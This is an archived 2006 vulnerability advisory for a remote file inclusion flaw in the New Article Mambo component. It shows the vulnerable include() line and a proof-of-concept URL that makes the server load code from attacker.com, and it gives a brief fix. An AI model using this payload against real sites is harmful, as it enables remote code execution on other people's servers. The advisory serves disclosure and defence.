namc10.txt

namc10.txt: Posted Jul 20, 2006; Authored by Matdhule; New Article Mambo Component versions 1.0 and below suffer from remote file inclusion vulnerabilities.; tags | exploit, remote, vulnerability, file inclusion; MD5 | dc2d1d8b5f3c982253ac104129ed147f; Download | Favorite | Comments (0)

namc10.txt

---------------------------------------------------------------------------------
New Article Mambo Component <= 1.0 (com_articles.php) Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 17th 2006
Location        : Indonesia, Jakarta
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : New Article Component (com_articles.php)

Version : 1.0

---------------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~

In folder components we found vulnerability script com_articles.php.

-----------------------com_articles.php---------------------------------
<?php

include($absolute_path.'/language/'.$lang.'/lang_articles.php');

require("classes/html/com_articles.php");
$articles = new articles();

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
 
Proof Of Concept:
~~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_articles.php?absolute_path=http://attacker.com/evil.txt?

---------------------------------------------------------------------------------

Solution:
~~~~~~~~
 
sanitize variabel $absolute_path.
 
 
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

namc10.txt

namc10.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

namc10.txt

Share This

namc10.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems